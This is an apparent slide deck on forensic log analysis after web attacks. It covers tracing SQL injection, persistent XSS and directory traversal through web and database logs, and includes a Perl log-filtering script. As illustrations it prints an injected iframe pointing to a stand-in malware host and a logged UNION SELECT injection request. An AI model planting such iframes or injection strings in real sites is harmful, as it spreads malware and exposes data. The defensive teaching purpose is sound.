Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysisin a Web Driven World

Manindra Kishore

Web Incidents - Overview

• A Glimpse of popular web based incidents

• Discussion of a sample incident

• Approach to Incident Analysis

A glimpse of few popular incidents

• SQL injection• XSS• CSRF• Broken authentication• Broken authorization• File inclusion• Password brute force• Directory traversal• Malicious file upload• Network enumeration• …………….

A few Attack Objectives

• Force connection to malware infected remote site

• Trick user into connecting to phishing site

• Steal data from backend database

• Obtain sensitive information from other internal machines

• A common attack vector --- SQL Injection

A sample incident:

Malware Download / Visit Phishing sites

• SQL Injection to change values in the backend DB

• Values changed to known malware distributing sites

• Each time page loads - Malware downloaded

• Multiple systems under attacker control

`User

http://bank.com/homepage.jsp

Exploits and Adds iframe Tag

<iframe src =“http://malware.com/malware"></iframe>

in page http://bank.com/homepage.jsp

Infected page Access request

Web site distributes malware

http://bank.com/homepage.jsp

Infected page served to user

<html><body>....

<iframe src =“http://malware.com/malware"></iframe>..

</body></html>

Accesses http://bank.com/homepage.jsp and finds out vulnerabilities

Home Page gets infected

Connection made to external site and malware gets downloaded in

background

UserID & Pswd

Incident occurred !!!What to do now?

A sample victimized 2 tier network

• The web server on intranet got hacked.

• I don’t know what else got hacked.

• I want Incident Analysis.

Acting ahead…

• Enumerate all entry points of network• Identify the components associated with

victimized component in network traffic• Obtain logs of all associated components• Perform Log Analysis

• This presentation focuses primarily on the attacks over the internet.

• Analysis of Intranet based attacks involve more or less the same steps not on the key focus here.

Candidates for Log Analysis(in this case)

• Cisco Internet Router• Cisco PIX Internet

Firewall:• Juniper Intranet Firewall• Cisco L3 switch

connecting all other servers

• IIS 6.0 Web Server• Tomcat Application

Server• Microsoft SQL Server

Database

Grounds for forensics: Log Analysis

A re-look at the attacks traceable by logs

A glimpse of major attacks for which forensics can be done by different sets of logs:• SQL Injection

• XSS

• SSI Injection

• Directory Traversal Attack

• PHP Remote File Inclusion Attack

• Upload Malicious Files

• Re-direction Attack

• Unwanted Apps/Directories open to Internet

• Misusing link for activation/authentication

• Brute Forcing

• Enumerating Data based on error messages/app features

• Session Hijack

• Deep URL

• Change Password

• Automated Attacks

• Response Splitting Attack

• Arbitrary HTTP methods allowed

Mapping Attack patterns to Logs

SQL Injection in the application retrieving data Web Logs/Database Logs

SQL Injection in the application injecting Iframe into database Web Logs/Database Logs

Persistent XSS on website Web Logs/Database Logs/Database Backup

PHP Local and Remote File inclusion to obtain source code and passwords Web Logs/Source Code

PHP Code Injection to retrieve database password Web Logs/Database Logs

Anonymous FTP / brute force passwords and steal backup stored FTP Logs

Direct connection to the Database and retrieve data Database Logs/OS Logs

Files available on the website found through directory browsing Web Logs

Brute forcing SAM file , RDP in and stealing database OS Logs

Upload an executable which will take a backup of the database and dump it out Web Logs/OS Logs/Database Logs

Vulnerability inside the application which allows DB backup/restore Application Logs/Database Logs

Identification of all other network services and check if any other way in Individual Network Service Logs

File upload of malicious file Web Logs/OS Logs/Database Logs

Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server Network Device Logs (Firewall + Switch)

Physical access to the server and copying data on removable media OS Logs

Choosing the right Log for analysis

• Different device logs help in forensics of different attack patterns

• Focusing on Internet based attacks, the major components for analysis are– Web Server– Database Server

Individual Analysis of elements

The components under discussion

• Web Servers – IIS– Apache

• Database Servers– MySQL– MSSQL

Web Server – Log Analysis – Step 1

• Web Server Logs are huge• Filter the relevant logs for analysis – Script

based approach– Eliminate all requests for non-existing files on webserver

• Obtain the list of all valid files from webpage source code

• Obtain all requests from the webserver with 200_OK response

• Do the matching, filter only relevant requests, eliminate the rest.

Example –• In a banking website we see a request for 3Dgames.php in the

Apache log – its obviously not valid.

• This can be confirmed by looking inside the source code directory and checking if there indeed was a file called 3Dgames.php.

• If not then we don't need to waste time analyzing those requests.

• A little bit of Basic Perl can help here.

A sample Perl Script

A sample script for finding out valid PHP pages - Can be modified for other types as well.

SCRIPT

#!/usr/bin/perl

open(PAGE , "<page_list") or die "Cannot open file:$!";

@all_pages = <PAGE>;

close(PAGE);

open(ALLPHP , "<gateway_only200_OK") or die "Cannot open file:$!";

@all_php_requests = <ALLPHP>;

close(ALLPHP);

open(VALIDPHP , ">all_valid_php") or die "Cannot open file:$!";

for ($j=0; $j<=$#all_pages; $j++){

chomp($all_pages[$j]);

@ddd = grep(/$all_pages[$j]/ , @all_php_requests);

print VALIDPHP @ddd;

}

close(VALIDPHP);

Web Server – Log Analysis – Step 2

• Identifying Valid Variables – In Remaining requests– List all the valid variables from page source code – Script

based approach

– Compare all the requests for presence of all valid variables

– If any invalid variable found in a request, eliminate the request

– Eventually, filter out all requests with all valid variables

A sample Perl Script output204.9.126.178 - -

[05/Aug/2009:11:31:54 -0500]

"GET /category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA%2C+&catid=search&searchgo.x=17&searchgo.y=12 HTTP/1.1"

--------------------

• The variables here are - q, catid, searchgo.x and searchgo.y

• The requested page is - category.php

• Now look at the list of valid variable from source code of page – category.php (script based approach)

• Figure out if the variables in request figure out here

• If not, then its not a valid request and can be eliminated

• Repeat the process for all requests (Script based approach as a whole)

• Eventually, filter out all request with valid variables

Web Server – Log Analysis – Step 3

Identify specific attack patterns - using a Log Parsing tool

• Example: – While trying to detect a directory traversal attack one needs

to parse the logs for the ‘../../’ pattern among others.

• Sample queries to carry out parsing process:

Log Parser

The Demos

• SQL Injection• Cross Site Scripting (XSS) – Persistent • Directory Traversal• PHP remote file inclusion• URL Redirection• Automated / Brute Force attacks

– Password cracking– Automated registrations– Session prediction– Directory brute forcing

DB Server – Log Analysis

• Attacks that can be detected by looking at the logs of a DB Server

– SQL Injection– XSS– Brute Forcing the DB Server

Log Analysis – MySQL DB Server

• SQL Injection1. Obtain the Query Logs. They are generally

available in ‘/mysql/data/’

2. Do a Code Review of the application and list down all the SQL queries from all pages on the application.

3. Match all the Queries in the Query Log with those obtained from code review. All queries which match are valid queries. The rest are invalid queries. Store all these invalid queries in a separate file as these are most probably the queries that an attacker used for SQL Injection.

Sample Grep Queries

Sample Grep queries to perform the action:

Grep Queries

• Cross Site Scripting (XSS) : Persistent 1. Parse the database for any instance of XSS. This

can be done by pattern matching.

2. Note down all the XSS strings found in the DB

3. Check the DB Query Log for instances of the string noted down. This can be done using the grep command.

• Exact elements for monitoring– Search for all these elements as follows:

<a> href

<iframe> src, url

<embed> src, pluginspage, pluginurl, href

<object> archive, classid, codebase, data usemap

<script> src

<img> longdesc, src, usemap

<applet> code, codebase, archive

<area> href, coords

More Attack Patterns

• Brute Forcing the DB Server– Go through the Error Logs in order to see if

there are repeated failed attempts in limited time duration.

What do we achieve…?

• Advantages of doing Log Analysis this way

• What have we not covered here and hope to cover in the future?

Thank You.

Manindra KishoreInformation Security Analyst / Consultant

[email protected]

Questions welcomed…